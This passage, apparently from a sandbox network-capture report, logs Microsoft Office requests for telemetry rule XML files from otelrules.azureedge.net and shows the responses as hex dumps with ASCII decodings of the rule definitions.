0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49826	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:33 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:33 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114833Z-174f7845968nxc96hC1EWRspw800000011100000000093m8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:33 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49827	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:33 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:33 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114833Z-174f7845968nxc96hC1EWRspw80000001150000000004n9z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:33 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49828	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:33 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:33 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 5c7cfbca-b01e-0002-28f7-411b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114833Z-174f7845968qj8jrhC1EWRh41s000000117g00000000951x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:33 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49829	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:33 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:33 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114833Z-174f7845968kdththC1EWRzvxn0000000dqg000000006d61 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:33 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:33 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:33 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: f58191a5-b01e-003e-1291-3f8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114833Z-174f7845968xr5c2hC1EWRd0hn0000000k5g0000000088h4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:33 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49831	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:35 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:35 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: dc6365ef-001e-0034-0cb3-42dd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114835Z-174f78459684db9fhC1EWRc7g400000001bg0000000073mt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:35 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49832	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:35 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:35 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:35 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: ba49513a-b01e-0098-68e4-41cead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114835Z-174f7845968glpgnhC1EWR7uec00000011hg000000005a38 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:35 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49834	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:35 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:35 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 77084b97-401e-0015-43af-420e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114835Z-174f7845968zgtf6hC1EWRqd8s0000000uc0000000003u9d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:36 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49833	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:35 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:35 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: c668448b-101e-007a-2d91-3f047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114835Z-174f7845968j6t2phC1EWRcfe800000011n0000000001v4h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:36 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49835	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:35 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:36 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:35 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 42f51266-b01e-0021-80fe-41cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114835Z-174f7845968xlwnmhC1EWR0sv8000000117g000000004k3a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:36 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49836	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:37 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:38 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:37 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 6eac8613-a01e-006f-3091-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114837Z-174f78459688l8rvhC1EWRtzr00000000dzg00000000559q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:38 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49837	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:37 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:38 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:38 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: ab0c55e0-101e-00a2-20a2-429f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114838Z-174f78459684db9fhC1EWRc7g400000001eg000000002z6n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:38 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

